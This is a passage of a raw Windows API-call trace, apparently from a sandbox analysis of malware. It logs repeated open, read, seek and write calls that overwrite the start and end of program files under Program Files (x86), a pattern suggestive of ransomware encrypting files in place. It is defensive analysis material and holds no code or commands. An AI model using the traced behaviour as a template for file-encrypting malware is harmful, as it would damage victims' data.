[0154.880] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="YST9", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="YST9", lpUsedDefaultChar=0x0) returned 4 [0154.880] ReadFile (in: hFile=0x1d8, lpBuffer=0x1f88c40, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88c40*, lpNumberOfBytesRead=0x2e9f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0154.881] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0154.882] WriteFile (in: hFile=0x1d8, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0154.882] CloseHandle (hObject=0x1d8) returned 1 [0154.882] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.883] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2b350 [0154.884] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.884] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.884] ReleaseMutex (hMutex=0x168) returned 1 [0154.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0154.884] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="THIRDPARTYLICENSEREADME.txt", cchWideChar=27, lpMultiByteStr=0x1f8fcfc, cbMultiByte=27, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="THIRDPARTYLICENSEREADME.txt", lpUsedDefaultChar=0x0) returned 27 [0154.884] ReadFile (in: hFile=0x1d8, lpBuffer=0x28de2a8, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x28de2a8*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0154.900] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2a350 [0154.900] ReadFile (in: hFile=0x1d8, lpBuffer=0x288b148, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288b148*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0154.901] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2a350 [0154.902] WriteFile (in: hFile=0x1d8, lpBuffer=0x288b148*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288b148*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0154.902] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0154.902] WriteFile (in: hFile=0x1d8, lpBuffer=0x28e62d8*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x28e62d8*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0154.902] CloseHandle (hObject=0x1d8) returned 1 [0154.902] CreateFileW (lpFileName="C:\\Program Files (x86)\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql90.xsl" (normalized: "c:\\program files (x86)\\microsoft analysis services\\as oledb\\10\\cartridges\\sql90.xsl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0154.904] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.904] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x9a5b [0154.904] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0154.904] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0154.904] ReleaseMutex (hMutex=0x168) returned 1 [0154.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0154.904] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="sql90.xsl", cchWideChar=9, lpMultiByteStr=0x1f7366c, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="sql90.xsl", lpUsedDefaultChar=0x0) returned 9 [0154.905] ReadFile (in: hFile=0x1d8, lpBuffer=0x288f948, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0155.018] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8a5b [0155.018] ReadFile (in: hFile=0x1d8, lpBuffer=0x289bad8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x289bad8*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0155.037] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x8a5b [0155.037] WriteFile (in: hFile=0x1d8, lpBuffer=0x2897aa8*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897aa8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0155.037] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0155.037] WriteFile (in: hFile=0x1d8, lpBuffer=0x2897aa8*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2897aa8*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0155.037] CloseHandle (hObject=0x1d8) returned 1 [0155.038] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\application.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\application.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0155.040] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0155.040] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x279 [0155.040] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0155.040] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.041] ReleaseMutex (hMutex=0x168) returned 1 [0155.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="application.ini", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0155.041] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="application.ini", cchWideChar=15, lpMultiByteStr=0x1f7356c, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="application.ini", lpUsedDefaultChar=0x0) returned 15 [0155.041] ReadFile (in: hFile=0x1d8, lpBuffer=0x2897ac8, nNumberOfBytesToRead=0x279, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesRead=0x2e9f2bc*=0x279, lpOverlapped=0x0) returned 1 [0155.087] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0155.087] WriteFile (in: hFile=0x1d8, lpBuffer=0x2897ac8*, nNumberOfBytesToWrite=0x801, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2897ac8*, lpNumberOfBytesWritten=0x2e9f2d0*=0x801, lpOverlapped=0x0) returned 1 [0155.087] CloseHandle (hObject=0x1d8) returned 1 [0155.087] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d8 [0155.089] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0155.089] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0xfa3 [0155.089] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0155.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0155.089] ReleaseMutex (hMutex=0x168) returned 1 [0155.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter.ini", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0155.089] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="crashreporter.ini", cchWideChar=17, lpMultiByteStr=0x1f88c44, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="crashreporter.ini", lpUsedDefaultChar=0x0) returned 17 [0155.089] ReadFile (in: hFile=0x1d8, lpBuffer=0x25a7b78, nNumberOfBytesToRead=0xfa3, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x25a7b78*, lpNumberOfBytesRead=0x2e9f2bc*=0xfa3, lpOverlapped=0x0) returned 1 [0156.090] SetFilePointer (in: hFile=0x1d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0156.090] WriteFile (in: hFile=0x1d8, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x152b, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f2d0*=0x152b, lpOverlapped=0x0) returned 1 [0156.090] CloseHandle (hObject=0x1d8) returned 1 [0156.091] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\maintenanceservice_installer.exe" (normalized: "c:\\program files (x86)\\mozilla firefox\\maintenanceservice_installer.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.726] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x2f7f8 [0156.727] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.727] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.727] ReleaseMutex (hMutex=0x168) returned 1 [0156.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice_installer.exe", cchWideChar=32, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 32 [0156.727] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="maintenanceservice_installer.exe", cchWideChar=32, lpMultiByteStr=0x1fa53fc, cbMultiByte=32, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="maintenanceservice_installer.exe", lpUsedDefaultChar=0x0) returned 32 [0156.727] ReadFile (in: hFile=0x1d4, lpBuffer=0x25a3b48, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x25a3b48*, lpNumberOfBytesRead=0x2e9f278*=0x8000, lpOverlapped=0x0) returned 1 [0156.732] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e7f8 [0156.732] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0156.733] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x2e7f8 [0156.733] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0156.734] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0156.734] WriteFile (in: hFile=0x1d4, lpBuffer=0x288f948*, nNumberOfBytesToWrite=0x8000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x288f948*, lpNumberOfBytesWritten=0x2e9f28c*=0x8000, lpOverlapped=0x0) returned 1 [0156.734] CloseHandle (hObject=0x1d4) returned 1 [0156.734] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\removed-files" (normalized: "c:\\program files (x86)\\mozilla firefox\\removed-files"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.735] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.735] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x8f3b [0156.736] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.736] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.736] ReleaseMutex (hMutex=0x168) returned 1 [0156.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="removed-files", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0156.736] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="removed-files", cchWideChar=13, lpMultiByteStr=0x1f7356c, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="removed-files", lpUsedDefaultChar=0x0) returned 13 [0156.736] ReadFile (in: hFile=0x1d4, lpBuffer=0x286cf58, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesRead=0x2e9f278*=0x4000, lpOverlapped=0x0) returned 1 [0156.737] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7f3b [0156.738] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0156.738] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x7f3b [0156.738] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0156.739] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0156.739] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x4000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f28c*=0x4000, lpOverlapped=0x0) returned 1 [0156.739] CloseHandle (hObject=0x1d4) returned 1 [0156.740] CreateFileW (lpFileName="C:\\Program Files (x86)\\Mozilla Firefox\\webapprt\\omni.ja" (normalized: "c:\\program files (x86)\\mozilla firefox\\webapprt\\omni.ja"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.741] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.741] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x69f7 [0156.741] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.741] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.741] ReleaseMutex (hMutex=0x168) returned 1 [0156.741] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0156.742] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="omni.ja", cchWideChar=7, lpMultiByteStr=0x1f7ad14, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="omni.ja", lpUsedDefaultChar=0x0) returned 7 [0156.742] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0156.744] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x59f7 [0156.745] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x2e9f278, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f278*=0x1000, lpOverlapped=0x0) returned 1 [0156.746] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=-4096, lpDistanceToMoveHigh=0x2e9f2e8*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f2e8*=0) returned 0x59f7 [0156.746] WriteFile (in: hFile=0x1d4, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0x1588, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x2e9f28c*=0x1588, lpOverlapped=0x0) returned 1 [0156.747] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f2bc*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f2bc*=0) returned 0x0 [0156.747] WriteFile (in: hFile=0x1d4, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x2e9f28c, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x2e9f28c*=0x1000, lpOverlapped=0x0) returned 1 [0156.747] CloseHandle (hObject=0x1d4) returned 1 [0156.748] CreateFileW (lpFileName="C:\\Program Files (x86)\\MSBuild\\Microsoft\\Windows Workflow Foundation\\v3.0\\Workflow.VisualBasic.Targets" (normalized: "c:\\program files (x86)\\msbuild\\microsoft\\windows workflow foundation\\v3.0\\workflow.visualbasic.targets"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1d4 [0156.749] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.749] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x143e [0156.749] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f8c0*=0) returned 0x0 [0156.749] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0156.749] ReleaseMutex (hMutex=0x168) returned 1 [0156.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.VisualBasic.Targets", cchWideChar=28, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0156.749] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Workflow.VisualBasic.Targets", cchWideChar=28, lpMultiByteStr=0x1f8fc6c, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Workflow.VisualBasic.Targets", lpUsedDefaultChar=0x0) returned 28 [0156.750] ReadFile (in: hFile=0x1d4, lpBuffer=0x1ea4488, nNumberOfBytesToRead=0x143e, lpNumberOfBytesRead=0x2e9f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesRead=0x2e9f2bc*=0x143e, lpOverlapped=0x0) returned 1 [0156.751] SetFilePointer (in: hFile=0x1d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x2e9f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x2e9f300*=0) returned 0x0 [0156.751] WriteFile (in: hFile=0x1d4, lpBuffer=0x286cf58*, nNumberOfBytesToWrite=0x19c6, lpNumberOfBytesWritten=0x2e9f2d0, lpOverlapped=0x0 | out: lpBuffer=0x286cf58*, lpNumberOfBytesWritten=0x2e9f2d0*=0x19c6, lpOverlapped=0x0) returned 1 [0156.751] CloseHandle (hObject=0x1d4) returned 1 [0156.751] CreateFileW (lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui" (normalized: "c:\\program files (x86)\\windows mail\\en-us\\winmail.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0156.752] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui", nBufferLength=0x104, lpBuffer=0x2e9f694, lpFilePart=0x2e9f690 | out: lpBuffer="C:\\Program Files (x86)\\Windows Mail\\en-US\\WinMail.exe.mui", lpFilePart=0x2e9f690*="WinMail.exe.mui") returned 0x39 [0156.752] GetLastError () returned 0x5 [0156.752] FormatMessageW (in: dwFlags=0x3300, 